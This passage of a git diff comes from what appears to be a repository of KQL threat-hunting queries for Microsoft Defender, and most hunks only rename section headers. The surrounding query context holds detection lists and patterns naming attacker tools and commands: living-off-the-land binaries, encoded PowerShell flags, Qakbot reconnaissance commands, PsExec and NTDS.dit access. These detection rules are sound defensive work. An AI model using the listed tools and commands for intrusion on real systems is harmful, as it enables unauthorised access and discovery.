"Forfiles.exe", "Ftp.exe", "Gpscript.exe", "Hh.exe", "IMEWDBLD.exe", "Ie4uinit.exe", "Ieexec.exe", "Ilasm.exe", "Infdefaultinstall.exe", "Installutil.exe", "Jsc.exe", "Ldifde.exe", "Makecab.exe", "Mavinject.exe", "Msedge.exe", "Microsoft.Workflow.Compiler.exe", "Mmc.exe", "MpCmdRun.exe", "Msbuild.exe", "Msconfig.exe", "Msdt.exe", "Mshta.exe", "Msiexec.exe", "Netsh.exe", "Odbcconf.exe", "OfflineScannerShell.exe", "OneDriveStandaloneUpdater.exe", "Pcalua.exe", "Pcwrun.exe", "Pktmon.exe", "Pnputil.exe", "Presentationhost.exe", "Print.exe", "PrintBrm.exe", "Psr.exe", "Rasautou.exe", "rdrleakdiag.exe", "Reg.exe", "Regasm.exe", "Regedit.exe", "Regini.exe", "Register-cimprovider.exe", "Regsvcs.exe", "Regsvr32.exe", "Replace.exe", "Rpcping.exe", "Rundll32.exe", "Runexehelper.exe", "Runonce.exe", "Runscripthelper.exe", "Sc.exe", "Schtasks.exe", "Scriptrunner.exe", "Setres.exe", "SettingSyncHost.exe", "Stordiag.exe", "SyncAppvPublishingServer.exe", "Ttdinject.exe", "Tttracer.exe", "Unregmp2.exe", "vbc.exe", "Verclsid.exe", "Wab.exe", "winget.exe", "Wlrmdr.exe", "Wmic.exe", "WorkFolders.exe", "Wscript.exe", "Wsreset.exe", "wuauclt.exe", "Xwizard.exe", "fsutil.exe", "wt.exe", "GfxDownloadWrapper.exe", "Advpack.dll", "Desk.cpl", "Dfshim.dll", "Ieadvpack.dll", "Ieframe.dll", "Mshtml.dll", "Pcwutl.dll", "Setupapi.dll", "Shdocvw.dll", "Shell32.dll", "Syssetup.dll", "Url.dll", "Zipfldr.dll", "Comsvcs.dll", "AccCheckConsole.exe", "adplus.exe", "AgentExecutor.exe", "Appvlp.exe", "Bginfo.exe", "Cdb.exe", "coregen.exe", "Createdump.exe", "csi.exe", "DefaultPack.EXE", "Devinit.exe"]); // List all lolbins that have made remote connection to public IPs between the last 30 and 2 days. diff --git a/Defender For Endpoint/Living Off The Land/RMMConnection.md b/Defender For Endpoint/Living Off The Land/RMMConnection.md index 8583e5a..2259f4d 100644 --- a/Defender For Endpoint/Living Off The Land/RMMConnection.md +++ b/Defender For Endpoint/Living Off The Land/RMMConnection.md @@ -20,7 +20,7 @@ An actor uses RRM tools to gain remote access to your environment. - https://lolrmm.io/ - https://x.com/Antonlovesdnb/status/1840823846720385482 -## Defender For Endpoint +## Defender XDR ```KQL // First part based on tweet by: @Antonlovesdnb https://x.com/Antonlovesdnb/status/1840823846720385482 let LOLRMM = externaldata(Name:string,Category:string,Description:string,Author:string,Date:datetime,LastModified:datetime,Website:string,Filename:string,OriginalFileName:string,PEDescription:string,Product:string,Privileges:string,Free:string,Verification:string,SupportedOS:string,Capabilities:string, diff --git a/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md b/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md index 69506c3..cee9c93 100644 --- a/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md +++ b/Defender For Endpoint/Living Off The Land/WMICRemoteCommand.md @@ -20,7 +20,7 @@ An actor uses WMIC to remotely execute malicious commands. - https://web.archive.org/web/20230728141353/https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmic -## Defender For Endpoint +## Defender XDR ``` let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; DeviceProcessEvents diff --git a/Defender For Endpoint/LocalAccountCreated.md b/Defender For Endpoint/LocalAccountCreated.md index a9429aa..eff7402 100644 --- a/Defender For Endpoint/LocalAccountCreated.md +++ b/Defender For Endpoint/LocalAccountCreated.md @@ -18,7 +18,7 @@ An actor uses a local account to perform malicious activities. Those accounts ar - https://blog.carnal0wnage.com/2012/09/more-on-aptsim.html - https://www.mandiant.com/resources/blog/darkside-affiliate-supply-chain-software-compromise -## Defender For Endpoint +## Defender XDR ``` // Collect all Server IDs for filter let Servers = DeviceInfo diff --git a/Defender For Endpoint/LocalAdminAdditions.md b/Defender For Endpoint/LocalAdminAdditions.md index 21f5904..bb4ce15 100644 --- a/Defender For Endpoint/LocalAdminAdditions.md +++ b/Defender For Endpoint/LocalAdminAdditions.md @@ -17,7 +17,7 @@ Local Admin accounts have high priviliges on and can should be limited. #### References - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#administrator -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "UserAccountAddedToLocalGroup" @@ -46,4 +46,4 @@ DeviceEvents | summarize LocalAdmins = make_set(AccountSid) by DeviceName | extend TotalLocalAdmins = array_length(LocalAdmins) | sort by TotalLocalAdmins -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md b/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md index bdeb720..073cd01 100644 --- a/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md +++ b/Defender For Endpoint/LocalAdminsWithTheMostDevicesAccessed.md @@ -1,6 +1,6 @@ # Hunt for Local Admins with the most RemoteInteractive logins ---- -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/LocalFirewallAdditions.md b/Defender For Endpoint/LocalFirewallAdditions.md index 775fa9f..b297f8e 100644 --- a/Defender For Endpoint/LocalFirewallAdditions.md +++ b/Defender For Endpoint/LocalFirewallAdditions.md @@ -1,6 +1,6 @@ # Hunt for Local Firewall Additions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/LocalFirewallDeletions.md b/Defender For Endpoint/LocalFirewallDeletions.md index 8e6049b..ba05471 100644 --- a/Defender For Endpoint/LocalFirewallDeletions.md +++ b/Defender For Endpoint/LocalFirewallDeletions.md @@ -1,6 +1,6 @@ # Hunt for Local Firewall Deletions ---- -### Defender For Endpoint +### Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/LocalGroupCreation.md b/Defender For Endpoint/LocalGroupCreation.md index cb9207f..c12a37c 100644 --- a/Defender For Endpoint/LocalGroupCreation.md +++ b/Defender For Endpoint/LocalGroupCreation.md @@ -11,7 +11,7 @@ Local groups can be created in order to evade AD Group requirements and control #### References - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/get-localgroup?view=powershell-5.1 -## Defender For Endpoint +## Defender XDR ```KQL let AllDomainControllers = DeviceNetworkEvents @@ -54,4 +54,4 @@ DeviceEvents | project DeviceId, OSPlatform, DeviceType) on DeviceId | project TimeGenerated, DeviceId, DeviceName, GroupName, GroupDomainName, GroupSid, OSPlatform, DeviceType, ReportId -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/LocalGroupDiscovery.md b/Defender For Endpoint/LocalGroupDiscovery.md index f75c6c3..16daa57 100644 --- a/Defender For Endpoint/LocalGroupDiscovery.md +++ b/Defender For Endpoint/LocalGroupDiscovery.md @@ -18,7 +18,7 @@ A compromised account performs discovery activities in your environment. - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF -## Defender For Endpoint +## Defender XDR ```KQL let WhitelistedDepartments = dynamic(["Service Desk", "It Admins"]); let StartTime = 30d; @@ -53,4 +53,4 @@ DeviceProcessEvents // Filter whitelisted departments | where not(Department in (WhitelistedDepartments)) | project-reorder TimeGenerated, Department, ProcessCommandLine, GroupName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/MultipleSentitiveGroupAdditions.md b/Defender For Endpoint/MultipleSentitiveGroupAdditions.md index 3ac6a71..c925043 100644 --- a/Defender For Endpoint/MultipleSentitiveGroupAdditions.md +++ b/Defender For Endpoint/MultipleSentitiveGroupAdditions.md @@ -17,7 +17,7 @@ An adversary got access to an account and tries to elevate permissions by adding #### References - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL let BinTimeFrame = 1h; let AlertThreshold = 3; @@ -76,4 +76,4 @@ DeviceProcessEvents | extend GroupIsSentitive = iff(ProcessCommandLine has_any (SensitiveGroupName), 1, 0) | summarize TotalCommands = dcount(ProcessCommandLine), ExecutedCommands = make_set(ProcessCommandLine), arg_max(TimeGenerated, *) by DeviceName, bin(TimeGenerated, BinTimeFrame) | where TotalCommands >= AlertThreshold -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NTDSDitFileModifications.md b/Defender For Endpoint/NTDSDitFileModifications.md index d5ec353..e7de8bb 100644 --- a/Defender For Endpoint/NTDSDitFileModifications.md +++ b/Defender For Endpoint/NTDSDitFileModifications.md @@ -28,7 +28,7 @@ To get all devices or all files, instead of adding those fields to the group by - [Introducing ntdissector, a swiss army knife for your NTDS.dit files](https://www.synacktiv.com/publications/introducing-ntdissector-a-swiss-army-knife-for-your-ntdsdit-files.html) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) search in(DeviceFileEvents) "ntds" and "dit" and ActionType:"FileModified" diff --git a/Defender For Endpoint/NetDiscoveryActivities.md b/Defender For Endpoint/NetDiscoveryActivities.md index 15e9e55..d259dbe 100644 --- a/Defender For Endpoint/NetDiscoveryActivities.md +++ b/Defender For Endpoint/NetDiscoveryActivities.md @@ -25,7 +25,7 @@ The query calculates the amount of executions for each parameter together with t - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; DeviceProcessEvents @@ -54,4 +54,4 @@ DeviceProcessEvents | where NetActionType != "Other" | where isnotempty(AccountUpn) | summarize TotalEvents = count(), TotalAccountsEvents = countif(NetActionType == "ACCOUNTS"), TotalGroupEvents = countif(NetActionType == "GROUP"), TotalUserEvents = countif(NetActionType == "USER"), TotalLocalGroupEvents = countif(NetActionType == "LOCALGROUP"), ExecutedCommands = make_set(ProcessCommandLine) by AccountUpn -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NetDiscoveryActivitiesDetected.md b/Defender For Endpoint/NetDiscoveryActivitiesDetected.md index cc35726..51df89d 100644 --- a/Defender For Endpoint/NetDiscoveryActivitiesDetected.md +++ b/Defender For Endpoint/NetDiscoveryActivitiesDetected.md @@ -33,7 +33,7 @@ An adversary has gained access to an account and tries to disover the network to - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 2d; let BinFormat = 1d; @@ -70,4 +70,4 @@ DeviceProcessEvents | summarize TotalEvents = count(), TotalAccountsEvents = countif(NetActionType == "ACCOUNTS"), TotalGroupEvents = countif(NetActionType == "GROUP"), TotalUserEvents = countif(NetActionType == "USER"), TotalLocalGroupEvents = countif(NetActionType == "LOCALGROUP"), ExecutedCommands = make_set(ProcessCommandLine), LastEvent = arg_max(TimeGenerated, *), FirstEvent = arg_min(TimeGenerated, *) by AccountUpn, bin(TimeGenerated, BinFormat) | where TotalEvents >= Threshold | project-reorder FirstEvent, LastEvent, TotalEvents, TotalAccountsEvents, TotalGroupEvents, TotalLocalGroupEvents, TotalUserEvents, ExecutedCommands -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/NetQueryStatistics.md b/Defender For Endpoint/NetQueryStatistics.md index 4f763a7..ad32932 100644 --- a/Defender For Endpoint/NetQueryStatistics.md +++ b/Defender For Endpoint/NetQueryStatistics.md @@ -10,7 +10,7 @@ This query can be used to list the statistics of the entities that have been que - https://www.trendmicro.com/en_us/research/19/f/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns.html - https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; DeviceProcessEvents @@ -57,4 +57,4 @@ DeviceProcessEvents | summarize arg_max(TimeGenerated, *) by ReportId | summarize TotalQueries = count() by QueriedEntity, NetActionType | sort by TotalQueries -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md b/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md index 544a120..1bb6fd3 100644 --- a/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md +++ b/Defender For Endpoint/Network - AnyDeskConnectionToPublicIP.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1219 | Remote Access Software | https://attack.mitre.org/techniques/T1219/ | -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md b/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md index 9aec998..f168bfd 100644 --- a/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md +++ b/Defender For Endpoint/Network - DevicesWithMostOpenPorts.md @@ -1,6 +1,6 @@ # List the devices with the most open ports ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Network - InterestingOpenPorts.md b/Defender For Endpoint/Network - InterestingOpenPorts.md index 16e3a31..8695caf 100644 --- a/Defender For Endpoint/Network - InterestingOpenPorts.md +++ b/Defender For Endpoint/Network - InterestingOpenPorts.md @@ -13,7 +13,7 @@ The interesting ports defined in the query: - 3306: MySQL - 8080: Alternative HTTP -## Defender For Endpoint +## Defender XDR ``` let portlist = dynamic([21, 22, 25, 53, 80, 110, 443, 1433, 1434, 3306, 8080]); //Add relevant ports in the list if needed diff --git a/Defender For Endpoint/Network - OpenDatabasePorts.md b/Defender For Endpoint/Network - OpenDatabasePorts.md index 0fa44c4..265f46e 100644 --- a/Defender For Endpoint/Network - OpenDatabasePorts.md +++ b/Defender For Endpoint/Network - OpenDatabasePorts.md @@ -10,7 +10,7 @@ The database ports defined in the query: - 5432: PostgreSQL -### Defender For Endpoint +### Defender XDR ``` let databaseports = dynamic([1433, 1434, 1583, 3050, 3306, 3351, 5432]); diff --git a/Defender For Endpoint/Network - OpenRemoteServicePorts.md b/Defender For Endpoint/Network - OpenRemoteServicePorts.md index 4a8780b..379948c 100644 --- a/Defender For Endpoint/Network - OpenRemoteServicePorts.md +++ b/Defender For Endpoint/Network - OpenRemoteServicePorts.md @@ -9,7 +9,7 @@ The database ports defined in the query: - 5985: WinRM v2 - 5986: WinRM -### Defender For Endpoint +### Defender XDR ``` let RemoteServices = dynamic([22, 139, 445, 3389, 5900, 5985, 5986]); diff --git a/Defender For Endpoint/NewRDPConnections.md b/Defender For Endpoint/NewRDPConnections.md index ff319ed..8d29106 100644 --- a/Defender For Endpoint/NewRDPConnections.md +++ b/Defender For Endpoint/NewRDPConnections.md @@ -1,6 +1,6 @@ # Detect new RDP connections to devices that have not been established in the past 20 days ---- -### Defender For Endpoint +### Defender XDR ```KQL let PreviousRDPConnections = materialize ( diff --git a/Defender For Endpoint/NewSysinternalToolDetected.md b/Defender For Endpoint/NewSysinternalToolDetected.md index fceed8b..4c980c1 100644 --- a/Defender For Endpoint/NewSysinternalToolDetected.md +++ b/Defender For Endpoint/NewSysinternalToolDetected.md @@ -1,6 +1,6 @@ # Detect the use of a new Sysinternal tool that has not been used in the last 90 days ---- -### Defender For Endpoint +### Defender XDR ``` let SysInternalSuite = dynamic(["accesschk.exe","accesschk64.exe","AccessEnum.exe", "AdExplorer.exe","ADExplorer.exe","ADExplorer64.exe","ADInsight.chm","ADInsight.exe","ADInsight64.exe","adrestore.exe","adrestore64.exe","Autologon.exe","Autologon64.exe","autoruns.chm","Autoruns.exe","Autoruns64.exe","autorunsc.exe","autorunsc64.exe","Bginfo.exe","Bginfo64.exe","Cacheset.exe","Cacheset64.exe","Clockres.exe","Clockres64.exe","Contig.exe","Contig64.exe","Coreinfo.exe","Coreinfo64.exe","CPUSTRES.exe","CPUSTRES64.exe","ctrl2cap.amd.sys","ctrl2cap.exe","Dbgview.chm","Dbgview.exe","dbgview64.exe","Desktops.exe","Desktops64.exe","Disk2vhd.chm","disk2vhd.exe","disk2vhd64.exe","diskext.exe","diskext64.exe","Diskmon.exe","Diskmon64.exe","DiskView.exe","DiskView64.exe","du.exe","du64.exe","efsdump.exe","Eula.txt","FindLinks.exe","FindLinks64.exe","handle.exe","handle64.exe","hex2dec.exe","hex2dec64.exe","junction.exe","junction64.exe","ldmdump.exe","Listdlls.exe","Listdlls64.exe","livekd.exe","livekd64.exe","LoadOrd.exe","LoadOrd64.exe","LoadOrdC.exe","LoadOrdC64.exe","logonsessions.exe","logonsessions64.exe","movefile.exe","movefile64.exe","notmyfault.exe","notmyfault64.exe","notmyfaultc.exe","notmyfaultc64.exe","ntfsinfo.exe","ntfsinfo64.exe","pendmoves.exe","pendmoves64.exe","pipelist.exe","pipelist64.exe","portmon.exe","procdump.exe","procdump64.exe","procexp.chm","procexp.exe","procexp64.exe","procmon.chm","Procmon.exe","Procmon64.exe","PsExec.exe","PsExec64.exe","psfile.exe","psfile64.exe","PsGetsid.exe","PsGetsid64.exe","PsInfo.exe","PsInfo64.exe","pskill.exe","pskill64.exe","pslist.exe","pslist64.exe","PsLoggedon.exe","PsLoggedon64.exe","psloglist.exe","psloglist64.exe","pspasswd.exe","pspasswd64.exe","psping.exe","psping64.exe","PsService.exe","PsService64.exe","psshutdown.exe","psshutdown64.exe","pssuspend.exe","pssuspend64.exe","Pstools.chm","psversion.txt","RAMMap.exe","RAMMap64.exe","RDCMan.exe","readme.txt","RegDelNull.exe","RegDelNull64.exe","regjump.exe","ru.exe","ru64.exe","sdelete.exe","sdelete64.exe","ShareEnum.exe","ShareEnum64.exe","ShellRunas.exe","sigcheck.exe","sigcheck64.exe","streams.exe","streams64.exe","strings.exe","strings64.exe","sync.exe","sync64.exe","Sysmon.exe","Sysmon64.exe","tcpvcon.exe","tcpvcon64.exe","tcpview.chm","tcpview.exe","tcpview64.exe","Testlimit.exe","Testlimit64.exe","Vmmap.chm","vmmap.exe","vmmap64.exe","Volumeid.exe","Volumeid64.exe","whois.exe","whois64.exe","Winobj.exe","Winobj64.exe","ZoomIt.exe","ZoomIt64.exe"]); diff --git a/Defender For Endpoint/NltestDiscovery.md b/Defender For Endpoint/NltestDiscovery.md index f88a249..5862fd8 100644 --- a/Defender For Endpoint/NltestDiscovery.md +++ b/Defender For Endpoint/NltestDiscovery.md @@ -44,4 +44,4 @@ DeviceProcessEvents | where ParsedCommandLine has_any (NLTestParameters) | summarize TotalQueries = count(), TotalUniqueQueries = dcount(ProcessCommandLine), Commands = make_set(ProcessCommandLine, 100), arg_max(TimeGenerated, *) by DeviceName, AccountUpn, bin(TimeGenerated, BinSize) | where TotalQueries >= Threshold -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/OutboundConhostConnection.md b/Defender For Endpoint/OutboundConhostConnection.md index f5eab01..9a13463 100644 --- a/Defender For Endpoint/OutboundConhostConnection.md +++ b/Defender For Endpoint/OutboundConhostConnection.md @@ -13,7 +13,7 @@ It is unexpected that conhost makes connections to external domains. - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules - example link 3 -## Defender For Endpoint +## Defender XDR ```KQL let ValidDomains = dynamic(['.microsoft.com', '.digicert.com']); DeviceNetworkEvents @@ -28,4 +28,4 @@ DeviceNetworkEvents | where InitiatingProcessFileName =~ "conhost.exe" | where not(ipv4_is_private(RemoteIP) or RemoteIP == "127.0.0.1") | where not(RemoteUrl has_any (ValidDomains)) -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PSExecExecutions.md b/Defender For Endpoint/PSExecExecutions.md index 20cf1af..4749fe4 100644 --- a/Defender For Endpoint/PSExecExecutions.md +++ b/Defender For Endpoint/PSExecExecutions.md @@ -15,7 +15,7 @@ A actor uses PsExec to remotely run commands. - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3 - https://www.cybereason.com/blog/research/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents // Collect all executed psexec commands @@ -41,4 +41,4 @@ DeviceProcessEvents // Collect stats and lists with remote devices and executed commands | summarize TotalRemoteDevices = dcount(RemoteDevice), RemoteDeviceList = make_set(RemoteDevice), ExecutedCommands = make_set(ProcessCommandLine) by DeviceName | sort by TotalRemoteDevices -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md b/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md index 620a93c..095f9e6 100644 --- a/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md +++ b/Defender For Endpoint/PowerShellEncodedCommandsByDevice.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1027 | Obfuscated Files or Information |https://attack.mitre.org/techniques/T1027/ | -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // For more results use line below en filter one above. This will also return more FPs. diff --git a/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md b/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md index 11582f9..938c777 100644 --- a/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md +++ b/Defender For Endpoint/PowerShellEncodedCommandsExecuted.md @@ -8,7 +8,7 @@ | --- | --- | --- | | T1027 | Obfuscated Files or Information |https://attack.mitre.org/techniques/T1027/ | -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); diff --git a/Defender For Endpoint/PowerShellEncodedReconActivities.md b/Defender For Endpoint/PowerShellEncodedReconActivities.md index 56d5726..292cf35 100644 --- a/Defender For Endpoint/PowerShellEncodedReconActivities.md +++ b/Defender For Endpoint/PowerShellEncodedReconActivities.md @@ -20,7 +20,7 @@ An advasary uses an encoded PowerShell command to collect information on of othe - https://community.sophos.com/sophos-labs/b/blog/posts/decoding-malicious-powershell - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); diff --git a/Defender For Endpoint/PowerShellEncodedWebRequests.md b/Defender For Endpoint/PowerShellEncodedWebRequests.md index 0dde8db..1c4bcbf 100644 --- a/Defender For Endpoint/PowerShellEncodedWebRequests.md +++ b/Defender For Endpoint/PowerShellEncodedWebRequests.md @@ -19,7 +19,7 @@ An advasary uses an encoded PowerShell command to collect a payload. - https://community.sophos.com/sophos-labs/b/blog/posts/decoding-malicious-powershell - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks -## Defender For Endpoint +## Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // For more results use line below en filter one above. This will also return more FPs. diff --git a/Defender For Endpoint/PowerShellInvokeWebrequest.md b/Defender For Endpoint/PowerShellInvokeWebrequest.md index 23810d5..38ca0d8 100644 --- a/Defender For Endpoint/PowerShellInvokeWebrequest.md +++ b/Defender For Endpoint/PowerShellInvokeWebrequest.md @@ -20,7 +20,7 @@ A malicious script is remotely downloaded and executed. - https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/ - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; let AllowedDomains = dynamic(['google.com']); @@ -63,4 +63,4 @@ DeviceNetworkEvents // If you only want to include servers in this detection use line below //| where DeviceId in (Servers) | project-reorder TimeGenerated, InitiatingProcessCommandLine, RemoteUrl, ActionType, CommandLineIpv4 -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PowerShellNoProfile.md b/Defender For Endpoint/PowerShellNoProfile.md index 41277c0..9dbc8a8 100644 --- a/Defender For Endpoint/PowerShellNoProfile.md +++ b/Defender For Endpoint/PowerShellNoProfile.md @@ -29,7 +29,7 @@ APT28 has access to your environment and executes malicious commands. - https://attack.mitre.org/groups/G0007/ - https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where ProcessCommandLine has_all ("-nop", "powershell.exe") @@ -40,4 +40,4 @@ DeviceProcessEvents DeviceProcessEvents | where ProcessCommandLine has_all ("-nop", "powershell.exe") | summarize TotalCommands = dcount(ProcessCommandLine), ExecutedCommands = make_set(ProcessCommandLine) by DeviceName -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/PublicFacingDeviceScanned.md b/Defender For Endpoint/PublicFacingDeviceScanned.md index 6f8a352..895ce06 100644 --- a/Defender For Endpoint/PublicFacingDeviceScanned.md +++ b/Defender For Endpoint/PublicFacingDeviceScanned.md @@ -15,7 +15,7 @@ Adversaries can get access trough open (vulnerable) services. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/internet-facing-devices?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md b/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md index 70ae3c8..de91abd 100644 --- a/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md +++ b/Defender For Endpoint/QakbotPostCompromiseCommandsExecuted.md @@ -1,6 +1,6 @@ # Detect when multiple Qakbot post compromise commands have been executed -### Defender For Endpoint +### Defender XDR ``` let QakBotCommands = dynamic(['net view', 'cmd /c set', 'arp -a', 'ipconfig /all', 'nslookup-querytype=ALL -timeout=12', '_ldap._tcp.dc._msdcs.WORKGROUP', 'net share', 'net1 share', 'route print', 'net localgroup', 'whoami /all']); // source: https://twitter.com/1ZRR4H/status/1568395544359309312 diff --git a/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md b/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md index 0bac4dc..28fe483 100644 --- a/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md +++ b/Defender For Endpoint/Ransomware/KillNetRansomwareDetection.md @@ -2,7 +2,7 @@ Source: https://www.virustotal.com/gui/file/db1c8ddcdfea93031a565001366ffa9fdb41a689bddab46aec7611a46bb4dc50/detection -### Defender For Endpoint +### Defender XDR ``` let killnetRansomNote = "ru.txt"; diff --git a/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md b/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md index 83ff3c2..9010654 100644 --- a/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md +++ b/Defender For Endpoint/Ransomware/RansomwareDoubleExtention.md @@ -22,7 +22,7 @@ Ransomware is being deployed in your environment. - https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/ -## Defender For Endpoint +## Defender XDR ``` // Based on https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml // Add your most common file extentions in this list diff --git a/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md b/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md index 0d812e2..f9f2c58 100644 --- a/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md +++ b/Defender For Endpoint/Ransomware/RansomwareExtensionFound.md @@ -1,6 +1,6 @@ # Triggers when a known ransomware extension has been found ---- -### Defender For Endpoint +### Defender XDR ``` let RansomwareExtensionsInput = externaldata(Extension: string)[@"https://raw.githubusercontent.com/eshlomo1/Ransomware-NOTE/main/ransomware-extension-list.txt"] with (format="txt", ignoreFirstRecord=True); diff --git a/Defender For Endpoint/Ransomware/RansomwareNoteFound.md b/Defender For Endpoint/Ransomware/RansomwareNoteFound.md index d646d89..5b102d7 100644 --- a/Defender For Endpoint/Ransomware/RansomwareNoteFound.md +++ b/Defender For Endpoint/Ransomware/RansomwareNoteFound.md @@ -1,6 +1,6 @@ # Triggers when a know ransomware note is found ---- -### Defender For Endpoint +### Defender XDR ``` let RansomwareNotes = externaldata(RansomwareNote: string)[@"https://raw.githubusercontent.com/eshlomo1/Ransomware-NOTE/main/ransomware-notes.txt"] with (format="txt", ignoreFirstRecord=True); diff --git a/Defender For Endpoint/RareConnectionsMadeByOffice.md b/Defender For Endpoint/RareConnectionsMadeByOffice.md index 4ed6ac3..4305570 100644 --- a/Defender For Endpoint/RareConnectionsMadeByOffice.md +++ b/Defender For Endpoint/RareConnectionsMadeByOffice.md @@ -1,6 +1,6 @@ # Hunt for the 20 most unusual connections made by Office. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/Defender For Endpoint/RareISOFile.md b/Defender For Endpoint/RareISOFile.md index 85e4652..2700702 100644 --- a/Defender For Endpoint/RareISOFile.md +++ b/Defender For Endpoint/RareISOFile.md @@ -24,7 +24,7 @@ A actor can use a malicious mounted ISO to gain initial access. - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/automount - https://www.cisa.gov/uscert/ncas/alerts/aa20-266a -## Defender For Endpoint +## Defender XDR ``` let 